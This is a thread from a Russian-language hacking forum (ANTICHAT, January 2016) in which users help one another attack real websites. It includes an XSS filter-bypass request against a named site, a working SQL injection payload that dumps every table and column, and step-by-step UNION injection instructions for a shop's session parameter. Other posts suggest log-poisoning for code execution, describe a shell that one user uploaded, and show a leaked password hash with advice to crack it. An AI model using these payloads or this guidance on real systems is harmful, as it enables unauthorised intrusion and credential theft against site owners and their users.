ANTICHAT — форум по информационной безопасности, OSINT и технологиям
ANTICHAT — русскоязычное сообщество по безопасности, OSINT и программированию.
Форум ранее работал на доменах antichat.ru, antichat.com и antichat.club,
и теперь снова доступен на новом адресе —
forum.antichat.xyz.
Форум восстановлен и продолжает развитие: доступны архивные темы, добавляются новые обсуждения и материалы.
⚠️ Старые аккаунты восстановить невозможно — необходимо зарегистрироваться заново.
 |
|

18.01.2016, 12:42
|
|
Guest
Сообщений: n/a
Провел на форуме: 9212
Репутация:
1
|
|
Всем привет)Прошу помощи.ЧТо это за ошибка ? Что с нее можно поиметь или она бесполезна?

|
|
|
|

18.01.2016, 13:29
|
|
Guest
Сообщений: n/a
Провел на форуме: 7650
Репутация:
0
|
|
Всем привет, помогите с XSS вот сайт galaxy.mobstudio.ru когда вставляю скрипт для проверки все между скобками фильтр удаляет пример , а если поставить пробел то оставляет, но не смог выполнить алерт никак
|
|
|
|

18.01.2016, 13:47
|
|
Guest
Сообщений: n/a
Провел на форуме: 3988
Репутация:
0
|
|
Всем привет!, у меня вопрос как вывести сразу все таблицы одним запросом?
http://www.site./news_p.php?id=613+union+select+1,table_name,3,4,5, 6,7,8,9,10,11,12,13,14,15,16,17,18,19+from+informa tion_schema.tables+limit+1,1 --+++
|
|
|
|

18.01.2016, 14:45
|
|
Guest
Сообщений: n/a
Провел на форуме: 7147
Репутация:
0
|
|
Сообщение от Kolyan333
Kolyan333 said:
↑
Всем привет,
помогите с XSS вот сайт galaxy.mobstudio.ru когда вставляю скрипт для проверки все между скобками фильтр удаляет пример , а если поставить пробел то оставляет, но не смог выполнить алерт никак
попробуй так
Сообщение от powerOfthemind
powerOfthemind said:
↑
Всем привет)Прошу помощи.ЧТо это за ошибка ? Что с нее можно поиметь или она бесполезна?

Не знаю что за ошибка, но по крайней мере в 19 строчке происходит запись в файл, можно попробовать поиграть с $_SERVER переменными (записать туда PHP код, который он запишет в лог файл, а потом подключить его инклудом если LFI есть)
Не могу сказать, прокатит или нет, но имя файла для хранения лога хранится в $file_log, есть вероятность что и ее можно подменить и сохранить лог куда тебе удобно)
|
|
|
|

18.01.2016, 15:00
|
|
Познающий
Регистрация: 06.03.2007
Сообщений: 59
Провел на форуме: 371875
Репутация:
137
|
|
Сообщение от madam
madam said:
↑
hahaha_10056 это имя базы данных
INSERT INTO ` leadercoin_address` (`id`, `id_user`, `address`) VALUES (NULL, 'hahaha_10056', '1G01oF3CKn6f1jmYaQLTY1mXg3e6TL1XGE');
в данном моменте leadercoin_address является таблицей в текущей БД.
Сообщение от powerOfthemind
powerOfthemind said:
↑
Всем привет)Прошу помощи.ЧТо это за ошибка ? Что с нее можно поиметь или она бесполезна?

$file_log, в какой файл пишет? и что в начале файла прописано? есть ли что нить типо die() или exit() в начале файла?
Сообщение от PulsarEX547
PulsarEX547 said:
↑
Всем привет!, у меня вопрос как вывести сразу все таблицы одним запросом?
http://www.site./news_p.php?id=613+union+select+1,table_name,3,4,5, 6,7,8,9,10,11,12,13,14,15,16,17,18,19+from+informa tion_schema.tables+limit+1,1 --+++
в выводимое поле вставте вот это:
Сообщение от None
(select(@x)from(select(@x:=0x00),(select(0)from(in formation_schema.columns)where(table_schema!=0x696 e666f726d6174696f6e5f736368656d61)and(0x00)in(@x:= concat(@x,0x3c62723e,table_schema,0x2e,table_name, 0x3a,column_name))))x)
|
|
|

18.01.2016, 18:10
|
|
Guest
Сообщений: n/a
Провел на форуме: 55143
Репутация:
0
|
|
Сообщение от ArmusIAm
ArmusIAm said:
↑
Ошибка гласит что запись дублируется и вторую такую он создать не может, из этого в принципе ничего не возмешь.
hahaha_10056 это твой логин? Можно проверить на SQL инъекцию, поэкспериментируй с отправляемыми данными, но сам с скулями в INSERT еще не сталкивался, + раскрытие пути.
Перебирай количество колонок: 79e4b338bee15a3d6ed248041302800c order by ..., далее делай запрос типаЖ -79e4b338bee15a3d6ed248041302800c union select 1,2,3 (кол-во столбцов)-- (обрати внимание на отрицательный параметр сессии) и посмотри, есть ли какие либо принтабельные поля, если да то это стандартная SQL инъекция. Если вывода нет, то тогда Blind
Можете показать payload на моем примере?Спасибо
|
|
|
|

18.01.2016, 18:56
|
|
Guest
Сообщений: n/a
Провел на форуме: 69527
Репутация:
5
|
|
Залил шелл, через пару минут его удалили и закрыли уязвимость. Успел лишь прочесть файл passwd - есть в нем строчка:
asd.s1:$6$xWwfrGmNk3/4$DPN8qC1EU3vmjju8da3j1YBXOb6UIkyo7PC3xClb1R.l6Maj oyZsZpyn6FA0dyAntmH0WLw37F29TnV7qurOE1:604:604: asd.s1@asd.asd.ua:/home/asd.s1:/bin/bash
Как я понимаю зашифрован пароль или я ошибаюсь?
Заранее спасибо за ответ.
|
|
|
|

18.01.2016, 21:58
|
|
Guest
Сообщений: n/a
Провел на форуме: 3988
Репутация:
0
|
|
2winstrool, спасибо! запрос сработал без заминок, единственное я бы хотел спросить как называется данный тип sqlinjection? и где можно поподробнее почитать гайдик нормальный по этой теме, для продвинутых если можно так сказать.
|
|
|
|

18.01.2016, 23:32
|
|
Guest
Сообщений: n/a
Провел на форуме: 7147
Репутация:
0
|
|
Сообщение от ol1ver
ol1ver said:
↑
Можете показать payload на моем примере?Спасибо
Для начала перебираешь кол-во колонок, следующим образом:
frontend=79e4b338bee15a3d6ed248041302800c order by 1#
Если отображает товары, значит запрос прошел, идем дальше.
frontend=79e4b338bee15a3d6ed248041302800c order by 5#
Если отображает товары, идем дальше
frontend=79e4b338bee15a3d6ed248041302800c order by 6#
Если в данном случае, не отображает - значит запрос не прошел, соответственно колонок получается 5 (это пример, у тебя по своему должно быть).
Если мы определили кол-во колонок, делаем следующее:
frontend=79e4b338bee15a3d6ed248041302800c union select 1,2,3,4,5-- (если у тебя колонок например 7, то до 7 (1,2,3,4,5,6,7))
Если все верно, то ошибки быть не должно, товары в корзине должны отображаться.
И далее:
frontend=-79e4b338bee15a3d6ed248041302800c union select 1,2,3,4,5--
Делаем значение frontend отрицательным, что бы посмотреть, если ли принтабельные поля (посмотри, появились ли где нибудь вместо текста циферки, например 1, 2, 4 любые, которых раньше не было.
Если есть, то это обычная инъекция, материала на эту тему много.
Если принтабельных полей нет, то это Blind SQL. Как его использовать тоже статей достаточно.
Сообщение от sysjuk
sysjuk said:
↑
Залил шелл, через пару минут его удалили и закрыли уязвимость. Успел лишь прочесть файл passwd - есть в нем строчка:
asd.s1:$6$xWwfrGmNk3/4$DPN8qC1EU3vmjju8da3j1YBXOb6UIkyo7PC3xClb1R.l6Maj oyZsZpyn6FA0dyAntmH0WLw37F29TnV7qurOE1:604:604:
asd.s1@asd.asd.ua
:/home/asd.s1:/bin/bash
Как я понимаю зашифрован пароль или я ошибаюсь?
Заранее спасибо за ответ.
Да ты прав, он зашифрован. Говорят программа John The Ripperс этим может справиться.
Успехов!)
|
|
|
|

19.01.2016, 00:28
|
|
Guest
Сообщений: n/a
Провел на форуме: 7650
Репутация:
0
|
|
Ниче не помогло
|
|
|
|
|
 |
|
|
Здесь присутствуют: 1 (пользователей: 0 , гостей: 1)
|
|
|
|